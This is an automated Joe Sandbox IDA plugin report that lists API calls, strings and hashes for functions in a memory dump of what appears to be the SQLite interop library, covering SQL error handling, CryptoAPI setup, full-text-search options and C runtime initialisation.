SIdb45e174afb28e2c.SQLITE.INTEROP(error SQL statement [%s]: %s,?,00000000), ref: 6BCC7091
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCC70C3
SIdb45e174afb28e2c.SQLITE.INTEROP(non-query: [%s],?), ref: 6BCC70EC
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCC7117

Strings

error SQL statement [%s]: %s, xrefs: 6BCC708C
S%d:, xrefs: 6BCC6DFC
T%d:, xrefs: 6BCC6FCB
SHA3 size should be one of: 224 256 384 512, xrefs: 6BCC6D57
B%d:, xrefs: 6BCC6FE3
non-query: [%s], xrefs: 6BCC70E7
I, xrefs: 6BCC6F0A
F, xrefs: 6BCC6FA8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I25ca8d2baaee0750.Ia364946505687432.Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.$I25d73a5ab4d6cacb.I30455e90830ca460.I558bdfe0e27562ea.I5b914c29cf5a7984.I8259474343588db4.I905dcc543d48caab._memset
String ID: B%d:$F$I$S%d:$SHA3 size should be one of: 224 256 384 512$T%d:$error SQL statement [%s]: %s$non-query: [%s]
API String ID: 2385748821-2082158347
Opcode ID: b0c328780f35f54028d571ec461cce38a239c47746de652289fcb59e44aa276e
Instruction ID: a317266532bbbfd4ee43209d023800c2ca1f880e2942fe377cc06758f4129aa5
Opcode Fuzzy Hash: b0c328780f35f54028d571ec461cce38a239c47746de652289fcb59e44aa276e
Instruction Fuzzy Hash: 4DD145719196409BD7108B38CC42B9FB7E5EFD5318F044A69E89897382EB3D9619C3E3

Function 6BBDF76D Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6BBD622E: EncodePointer.KERNEL32(00000000,6BBDF793,6BD19A58,00000314,00000000,?,?,?,?,?,6BBDDA8F,6BD19A58,Microsoft Visual C++ Runtime Library,00012010), ref: 6BBD6230

LoadLibraryW.KERNEL32(USER32.DLL,6BD19A58,00000314,00000000), ref: 6BBDF7A8
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 6BBDF7C4
EncodePointer.KERNEL32(00000000), ref: 6BBDF7D5
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 6BBDF7E2
EncodePointer.KERNEL32(00000000), ref: 6BBDF7E5
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 6BBDF7F2
EncodePointer.KERNEL32(00000000), ref: 6BBDF7F5
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 6BBDF802
EncodePointer.KERNEL32(00000000), ref: 6BBDF805
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 6BBDF816
EncodePointer.KERNEL32(00000000), ref: 6BBDF819
DecodePointer.KERNEL32(00000000,6BD19A58,00000314,00000000), ref: 6BBDF83B
DecodePointer.KERNEL32 ref: 6BBDF845
DecodePointer.KERNEL32(?,6BD19A58,00000314,00000000), ref: 6BBDF884
DecodePointer.KERNEL32(?), ref: 6BBDF89E
DecodePointer.KERNEL32(6BD19A58,00000314,00000000), ref: 6BBDF8B2

Strings

GetLastActivePopup, xrefs: 6BBDF7E7
GetUserObjectInformationW, xrefs: 6BBDF7F7
GetProcessWindowStation, xrefs: 6BBDF810
GetActiveWindow, xrefs: 6BBDF7D7
USER32.DLL, xrefs: 6BBDF7A3
MessageBoxW, xrefs: 6BBDF7BE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
API String ID: 1951731885-564504941
Opcode ID: 2d7acfe58887e7e9ccf38472916eda7938aafdcdb192a1e3d264b59d6380061a
Instruction ID: a2b3c498b46c6b628a311a71f9f97480a4494377702ceac230d73603b5fc88a0
Opcode Fuzzy Hash: 2d7acfe58887e7e9ccf38472916eda7938aafdcdb192a1e3d264b59d6380061a
Instruction Fuzzy Hash: 3B411975E0424AEBEF019BB5CC45A6FBBACEF49350B400476E518E7140DB3ED506CBA1

Function 6BCC7150 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 320COMMON

Download Yara Rule

Strings

error SQL statement [%s]: %s, xrefs: 6BCC7511
F, xrefs: 6BCC7458
S%d:, xrefs: 6BCC72AC
T%d:, xrefs: 6BCC7477
B%d:, xrefs: 6BCC74A1
non-query: [%s], xrefs: 6BCC756C
I, xrefs: 6BCC73B6

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: B%d:$F$I$S%d:$T%d:$error SQL statement [%s]: %s$non-query: [%s]
API String ID: 0-488465397
Opcode ID: ceea2e38b88115b4cef03b247639e1e13afb2787debc3e35348082222b3be8b4
Instruction ID: 1705454db8df1c86a43364a574594293f553e7582dacf9ba201aa6a7fc71ddf5
Opcode Fuzzy Hash: ceea2e38b88115b4cef03b247639e1e13afb2787debc3e35348082222b3be8b4
Instruction Fuzzy Hash: B3B1E2B15193409BD710DF388842B9FBBA4EFD6318F54496DF48897241EB389A09C7A3

Function 6BCCF920 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 118encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6BCCF97D
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCCF98A
CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 6BCCF9B6
GetLastError.KERNEL32 ref: 6BCCF9C0
SIdb45e174afb28e2c.SQLITE.INTEROP(CryptAcquireContext failed, code=%lu,00000000), ref: 6BCCF9CC

Part of subcall function 6BCC5630: _memset.LIBCMT ref: 6BCC5737

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 6BCCF9A6
cryptoapi_decrypt, xrefs: 6BCCFA1A
CryptAcquireContext failed, code=%lu, xrefs: 6BCCF9C7
cryptoapi_encrypt, xrefs: 6BCCFA4A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: ContextCrypt$AcquireErrorIaa0f8e0c251cfd1d.Idb45e174afb28e2c.LastRelease_memset
String ID: CryptAcquireContext failed, code=%lu$Microsoft Enhanced Cryptographic Provider v1.0$cryptoapi_decrypt$cryptoapi_encrypt
API String ID: 1962234622-3603160501
Opcode ID: 23214cdc66911b1adc75e33810ef0b0f8b08d551082ac389c14138adaf2179ae
Instruction ID: 22c9e2407e6e2254bbfbbb8b175d25211b5c70baa84815300f597d5dc4cbd0c8
Opcode Fuzzy Hash: 23214cdc66911b1adc75e33810ef0b0f8b08d551082ac389c14138adaf2179ae
Instruction Fuzzy Hash: B331E772A613107BE7209F759C06F5B77D89F50718F108029FA58DB280FB79E74483A6

Function 6BC53760 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 493COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000152F8,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5383E

Strings

%s at line %d of [%.10s], xrefs: 6BC53837, 6BC53D8D
(, xrefs: 6BC53BD1
database corruption, xrefs: 6BC53832, 6BC53D88
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC53828, 6BC53D7E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$($database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-1483524669
Opcode ID: 6cd96235e975ea8402108662bbe59fa02e904b7eafd4272fde669a1a4a05b720
Instruction ID: b9aefc6812c4f1b235a02ca485ec7ac4a5bbb39e9614314e32e6a91a9168d48a
Opcode Fuzzy Hash: 6cd96235e975ea8402108662bbe59fa02e904b7eafd4272fde669a1a4a05b720
Instruction Fuzzy Hash: 3402F372A282418FC320CF68C49066ABBF1FBC1350F14499EE8D78B251E739EA74CB55

Function 6BC13FA0 Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC14043
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC140E7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC14101
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC141D8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC141F2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC1420B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Iaa0f8e0c251cfd1d.
String ID:
API String ID: 2940838516-0
Opcode ID: 45a0789ca1caecee34eb0f3460aa74ceb5a4ef6e684e0b1ce7a7ad41d5cad3bf
Instruction ID: 7a3983cd1bbcd7173671c5106c6bac4865cf81ffddc07390bdb1c4f017148f61
Opcode Fuzzy Hash: 45a0789ca1caecee34eb0f3460aa74ceb5a4ef6e684e0b1ce7a7ad41d5cad3bf
Instruction Fuzzy Hash: 1E816F71A15B059FE718CF3AC8816DAB7EAEF95308F14C56DE869DB210F73596019B00

Function 6BBD1186 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6BBD34F1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BBD3506
UnhandledExceptionFilter.KERNEL32(6BCEF374), ref: 6BBD3511
GetCurrentProcess.KERNEL32(C0000409), ref: 6BBD352D
TerminateProcess.KERNEL32(00000000), ref: 6BBD3534

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: ba9b2547d81174fee3b296841f9f265e7132052eb0472f2ab789225dfe076a56
Instruction ID: fddc0ef7a195bae4635eb2e1a43891b11733c8bbd66ed44b60cbf0903fcab6a6
Opcode Fuzzy Hash: ba9b2547d81174fee3b296841f9f265e7132052eb0472f2ab789225dfe076a56
Instruction Fuzzy Hash: 5821CFB890024ADFFF00CFA4D186684BBB4BB4A715F90501AE509AB342E77CD683CF19

Function 6BC16DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC16FBA
_memset.LIBCMT ref: 6BC17033
_memmove.LIBCMT ref: 6BC17304

Strings

@, xrefs: 6BC170A8

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset$_memmove
String ID: @
API String ID: 2532777613-2766056989
Opcode ID: 4be8349b643116a185aab406ff758e935d5a1cd7b7fd0187728cea540a845092
Instruction ID: dde925cc7ae031419aeede601eebcbf85296147234546182cd195f0a3f674150
Opcode Fuzzy Hash: 4be8349b643116a185aab406ff758e935d5a1cd7b7fd0187728cea540a845092
Instruction Fuzzy Hash: ADF1097150E7914BC311DF38D0907EBBBE0AF99318F440DAEE8D957242D628E749DBA2

Function 6BC01A40 Relevance: 3.0, APIs: 2, Instructions: 21encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,?,6BCCF9DC,00000000,CryptAcquireContext failed, code=%lu,00000000), ref: 6BC01A5A
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,00000000,?,6BCCF9DC,00000000,CryptAcquireContext failed, code=%lu,00000000), ref: 6BC01A67

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: ContextCryptIaa0f8e0c251cfd1d.Release
String ID:
API String ID: 3500827864-0
Opcode ID: da6591b05d1158e83dbc95b3894579c94a85d8f208d2cc3604f9ae9d777eb226
Instruction ID: 779af5f4f4d3b9398c92731910d4ec0bffcb62c895868f8e4661cccf7436894b
Opcode Fuzzy Hash: da6591b05d1158e83dbc95b3894579c94a85d8f208d2cc3604f9ae9d777eb226
Instruction Fuzzy Hash: 9CE0C272A123349BEB205E58E800B46B3EC9F01B6CF000058F84997240EB7AF78096E5

Function 6BBD65D2 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD65DA
__mtterm.LIBCMT ref: 6BBD65E6

Part of subcall function 6BBD62B1: DecodePointer.KERNEL32(0000000D,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD62C2
Part of subcall function 6BBD62B1: TlsFree.KERNEL32(00000026,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD62DC
Part of subcall function 6BBD62B1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBDC08F
Part of subcall function 6BBD62B1: _free.LIBCMT ref: 6BBDC092
Part of subcall function 6BBD62B1: DeleteCriticalSection.KERNEL32(00000026,?,?,6BBD32A5,6BBD328B,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBDC0B9

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6BBD65FC
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6BBD6609
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6BBD6616
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6BBD6623
TlsAlloc.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD6673
TlsSetValue.KERNEL32(00000000,?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD668E
__init_pointers.LIBCMT ref: 6BBD6698
EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66A9
EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66B6
EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66C3
EncodePointer.KERNEL32(?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66D0
DecodePointer.KERNEL32(Function_00006435,?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD66F1
__calloc_crt.LIBCMT ref: 6BBD6706
DecodePointer.KERNEL32(00000000,?,?,6BBD31E2,6BD11440,00000008,6BBD3376,?,?,?,6BD11460,0000000C,6BBD3431,?), ref: 6BBD6720
GetCurrentThreadId.KERNEL32 ref: 6BBD6732

Strings

FlsAlloc, xrefs: 6BBD65F6
KERNEL32.DLL, xrefs: 6BBD65D5
FlsFree, xrefs: 6BBD6618
FlsSetValue, xrefs: 6BBD660B
FlsGetValue, xrefs: 6BBD65FE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: d1e8c081db3daba13fa911a50fa6948fa79dd401e95395a97cce11392f31653c
Instruction ID: f2b74b6ec47d7ad08c519a3d9f426a7d917ef4ef0fd91cd8e6fd937799f6aaa8
Opcode Fuzzy Hash: d1e8c081db3daba13fa911a50fa6948fa79dd401e95395a97cce11392f31653c
Instruction Fuzzy Hash: 4A319C31C00745AFFF15AF75D80EA49BAA9EF47620790026AF4169A291EB7CD103CF60

Function 6BC43AD0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 238COMMON

Download Yara Rule

APIs

SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43B00
SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43B12
SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43B65
SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43B77
SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43BC3
SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43BD5
SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43C30
SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43C3E
SI5b4aedd0c04bd151.SQLITE.INTEROP ref: 6BC43C95
SI5b914c29cf5a7984.SQLITE.INTEROP ref: 6BC43CA7

Strings

automerge, xrefs: 6BC43BAA
rank, xrefs: 6BC43CE9
hashsize, xrefs: 6BC43B4C
crisismerge, xrefs: 6BC43C82
pgsz, xrefs: 6BC43AE6
usermerge, xrefs: 6BC43C13

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I5b4aedd0c04bd151.I5b914c29cf5a7984.
String ID: automerge$crisismerge$hashsize$pgsz$rank$usermerge
API String ID: 199341400-4069215817
Opcode ID: dbb91913b429234b639e0d971f2eff0d7848d679f53b2fc321aa8f20b9a6ed73
Instruction ID: 5b2978430f33aec3a1dc54ce0e0b05a34559f5003b936df52fa54434e00ae66c
Opcode Fuzzy Hash: dbb91913b429234b639e0d971f2eff0d7848d679f53b2fc321aa8f20b9a6ed73
Instruction Fuzzy Hash: 10710671D241554BDB20CB78998066EBBB8EFC5219F1045EAEC89CB201FB3EDB508B91

Function 6BC5D8C0 Relevance: 25.0, APIs: 6, Strings: 8, Instructions: 466COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(not authorized,?,?), ref: 6BC5D918
SIdb45e174afb28e2c.SQLITE.INTEROP(%s.%s,?,00000000), ref: 6BC5D97F
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC5D9A3
SIdb45e174afb28e2c.SQLITE.INTEROP(error during initialization: %s,?), ref: 6BC5DD08
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC5DD17
_memset.LIBCMT ref: 6BC5DD65

Strings

unable to open shared library [%.*s], xrefs: 6BC5DA02
lib, xrefs: 6BC5DAF7
error during initialization: %s, xrefs: 6BC5DD03
_init, xrefs: 6BC5DB43
%s.%s, xrefs: 6BC5D97A
sqlite3_, xrefs: 6BC5DAC2
not authorized, xrefs: 6BC5D913
no entry point [%s] in shared library [%s], xrefs: 6BC5DBCD

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idb45e174afb28e2c.$Iaa0f8e0c251cfd1d.$_memset
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$unable to open shared library [%.*s]
API String ID: 1491502024-2763346821
Opcode ID: b7a2745de88085a32ec87ec438f26c37606552840b8b18515b12311f4124343c
Instruction ID: d52a618f82473b7fcdebdd94e0d2a3a9f514b5a93d8d0687294f83004ecde327
Opcode Fuzzy Hash: b7a2745de88085a32ec87ec438f26c37606552840b8b18515b12311f4124343c
